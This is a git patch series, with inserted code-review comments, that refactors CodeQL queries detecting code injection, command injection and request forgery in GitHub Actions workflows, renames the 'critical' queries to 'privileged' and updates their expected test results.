<46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:07:01 +0100 Subject: [PATCH 0122/1267] Add `GITHUB_TOKEN` --- action.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/action.yml b/action.yml index a294e981493..f88e3b07850 100644 --- a/action.yml +++ b/action.yml @@ -24,6 +24,7 @@ runs: - name: Do something with context shell: bash env: + GITHUB_TOKEN: ${{ github.token }} GH_TOKEN: ${{ github.token }} run: | node ${{ github.action_path }}/.github/action/dist/index.js 
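Review bot: In `ql/lib/qlpack.yml` the constraints on `codeql/controlflow` and `codeql/dataflow` go from `^0.1.7` to `"*"`, so pack resolution now accepts any published version, including ones with breaking API changes. The diffstat of this commit touches only the two `qlpack.yml` files, so whether the pack's lock file still pins the resolved versions cannot be seen here. If it is not refreshed and committed alongside this change, builds stop being reproducible. Keeping a bounded range, or adding a comment such as `# resolved versions are pinned by codeql-pack.lock.yml`, would make the intent explicit.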
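Review bot: The step in `action.yml` now receives the same `${{ github.token }}` under both `GITHUB_TOKEN` and `GH_TOKEN`, and nothing in the hunk says which consumer reads which name. A comment on the new line, for example `# GITHUB_TOKEN is read by dist/index.js; GH_TOKEN is kept for tooling that reads that name`, would stop a later cleanup from dropping one of them; that split is an assumption and needs confirming against the code. Because the token carries whatever permissions the calling job grants, the action's documentation should also list the minimum `permissions:` it needs. The step's `run:` block continues outside the hunk.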
From 169e57e87499fbe591a0e2f3d088b4ce68f02632 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 11:10:41 +0100 Subject: [PATCH 0123/1267] Refactor queries --- .../actions/security/CodeInjectionQuery.qll | 25 ++ .../security/CommandInjectionQuery.qll | 22 ++ .../actions/security/RequestForgeryQuery.qll | 22 ++ ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 12 +- .../CWE-020/ReusableWorkflowsSinks.ql | 12 +- ql/src/Security/CWE-078/CommandInjection.ql | 24 +- .../CWE-078/CriticalCommandInjection.ql | 45 --- .../CWE-078/PrivilegedCommandInjection.ql | 29 ++ ql/src/Security/CWE-094/CodeInjection.ql | 24 +- .../Security/CWE-094/CriticalCodeInjection.ql | 47 --- .../CWE-094/CriticalExpressionInjection.ql | 48 --- .../Security/CWE-094/ExpressionInjection.ql | 42 --- .../CWE-094/PrivilegedCodeInjection.ql | 31 ++ ql/src/Security/CWE-918/RequestForgery.ql | 24 +- .../CWE-078/CriticalCommandInjection.qlref | 1 - ...ed => PrivilegedCommandInjection.expected} | 2 +- .../CWE-078/PrivilegedCommandInjection.qlref | 1 + .../Security/CWE-094/CodeInjection.expected | 272 +++++++++++++++++ .../CWE-094/CriticalCodeInjection.expected | 14 - .../CWE-094/CriticalCodeInjection.qlref | 1 - .../CWE-094/CriticalExpressionInjection.qlref | 1 - .../CWE-094/ExpressionInjection.expected | 276 ------------------ .../CWE-094/ExpressionInjection.qlref | 1 - ...ected => PrivilegedCodeInjection.expected} | 150 +++++----- .../CWE-094/PrivilegedCodeInjection.qlref | 1 + 26 files changed, 501 insertions(+), 628 deletions(-) create mode 100644 ql/lib/codeql/actions/security/CodeInjectionQuery.qll create mode 100644 ql/lib/codeql/actions/security/CommandInjectionQuery.qll create mode 100644 ql/lib/codeql/actions/security/RequestForgeryQuery.qll delete mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-078/PrivilegedCommandInjection.ql delete mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql delete mode 100644 
ql/src/Security/CWE-094/CriticalExpressionInjection.ql delete mode 100644 ql/src/Security/CWE-094/ExpressionInjection.ql create mode 100644 ql/src/Security/CWE-094/PrivilegedCodeInjection.ql delete mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{CriticalCommandInjection.expected => PrivilegedCommandInjection.expected} (58%) create mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref rename ql/test/query-tests/Security/CWE-094/{CriticalExpressionInjection.expected => PrivilegedCodeInjection.expected} (70%) create mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll new file mode 100644 index 00000000000..c2453cb1652 --- /dev/null +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll 
@@ -0,0 +1,25 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() {
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
+ externallyDefinedSink(this, "code-injection")
+ }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a code script.
+ */
+private module CodeInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */
+module CodeInjectionFlow = TaintTracking::Global;
diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
new file mode 100644
index 00000000000..8eda87f1cae
--- /dev/null
+++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll
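Review bot: `CodeInjectionSink` accepts externally modelled sinks only under the kind `"code-injection"`, while the sink classes this commit deletes matched `"expression-injection"`, so a `sinkModel` row that still uses the old kind will stop producing sinks without any error. The commit updates `ql/lib/ext/TEST-RW-MODELS.model.yml`, but other model files are not visible here and should be checked for the old string. The class is also public and undocumented; a QLDoc line such as `/** An expression in a Run step's script, or a sink modelled externally with kind "code-injection". */` would record both origins.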
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a system command.
+ */
+private module CommandInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */
+module CommandInjectionFlow = TaintTracking::Global;
diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
new file mode 100644
index 00000000000..80e3d93ee69
--- /dev/null
+++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
@@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module RequestForgeryConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module RequestForgeryFlow = TaintTracking::Global; diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 7adbcd5adbd..44897ef3311 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -14,4 +14,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 0ea0713983d..54f58e6b63e 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
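Review bot: Both doc comments in `RequestForgeryQuery.qll` were carried over from the command-injection module and still say the input "is used to construct and evaluate a system command", which does not describe a request-forgery sink. Suggested wording is `* that is used to construct the target of an outgoing request.` for the configuration comment and `/** Tracks flow of unsafe user input that is used to construct the target of an outgoing request. */` for the flow module. `RequestForgerySink` has no QLDoc either. Its only characteristic is `externallyDefinedSink(this, "request-forgery")`, so one line saying that sinks come solely from external models would explain why the query reports nothing when no such model is loaded.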
@@ -12,24 +12,16 @@ */ import actions -import codeql.actions.DataFlow +import codeql.actions.security.CodeInjectionQuery import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 31fbc1eaae2..2dd5bf1cfef 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,24 +12,16 @@ */ import actions -import codeql.actions.DataFlow +import codeql.actions.security.CodeInjectionQuery import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } } module MyFlow = TaintTracking::Global; 
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index bdc341e8caf..826a3b41e38 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -13,27 +13,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph -private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +where CommandInjectionFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql deleted file mode 100644 index dddbd142873..00000000000 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ /dev/null 
@@ -1,45 +0,0 @@ -/** - * @name Command built from user-controlled sources - * @description Building a system command from user-controlled sources is vulnerable to insertion of - * malicious code by the user. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-command-injection - * @tags actions - * security - * external/cwe/cwe-078 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential critical command injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql new file mode 100644 index 00000000000..6f66535e6a4 --- /dev/null +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql 
@@ -0,0 +1,29 @@
+/**
+ * @name Command built from user-controlled sources on a privileged context
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.security.CommandInjectionQuery
+import CommandInjectionFlow::PathGraph
+
+from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w
+where
+ CommandInjectionFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged command injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
index 3bac9cec348..f71c178822c 100644
--- a/ql/src/Security/CWE-094/CodeInjection.ql
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
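Review bot: `PrivilegedCommandInjection.ql` is named for a privileged context, but its `@description` is the same text as the unprivileged query and never says what "privileged" means. The `where` clause only requires that the enclosing workflow is a `ReusableWorkflow` or has a trigger event returned by the source's `getATriggerEvent()`; nothing visible checks token permissions or secret access. The header should state that definition, for example `@description ... in a workflow that is reusable or is triggered by the event that supplies the tainted value.`, so that readers of a severity-9 alert do not assume a permissions check was made. The same applies to `PrivilegedCodeInjection.ql`. Both files carry an identical condition, so a shared predicate in the library would keep them from drifting apart.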
@@ -15,27 +15,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph -private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +where CodeInjectionFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql deleted file mode 100644 index 64d8a6e4328..00000000000 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ /dev/null 
@@ -1,47 +0,0 @@ -/** - * @name Code injection - * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary - * code execution. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-code-injection - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential critical code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql deleted file mode 100644 index e24b1ab9ddc..00000000000 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ /dev/null 
@@ -1,48 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-expression-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql deleted file mode 100644 index 1e7414e5ce6..00000000000 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ /dev/null 
@@ -1,42 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision high - * @id actions/expression-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) -select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql new file mode 100644 index 00000000000..69ab240616e --- /dev/null +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql 
@@ -0,0 +1,31 @@
+/**
+ * @name Code injection on a privileged context
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.security.CodeInjectionQuery
+import CodeInjectionFlow::PathGraph
+
+from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w
+where
+ CodeInjectionFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged code injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql
index 228c94f383b..3700201c315 100644
--- a/ql/src/Security/CWE-918/RequestForgery.ql
+++ b/ql/src/Security/CWE-918/RequestForgery.ql
@@ -12,27 +12,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.RequestForgeryQuery +import RequestForgeryFlow::PathGraph -private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from RequestForgeryFlow::PathNode source, RequestForgeryFlow::PathNode sink +where RequestForgeryFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref deleted file mode 100644 index ceb027c8058..00000000000 --- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/CriticalCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected similarity index 58% rename from ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 8a3d19402b7..13d146a2570 100644 --- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected 
+++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref new file mode 100644 index 00000000000..2c7cc5c5fde --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/PrivilegedCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 4ef832d9d22..23e50256756 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -1,14 +1,286 @@ edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| 
.github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| 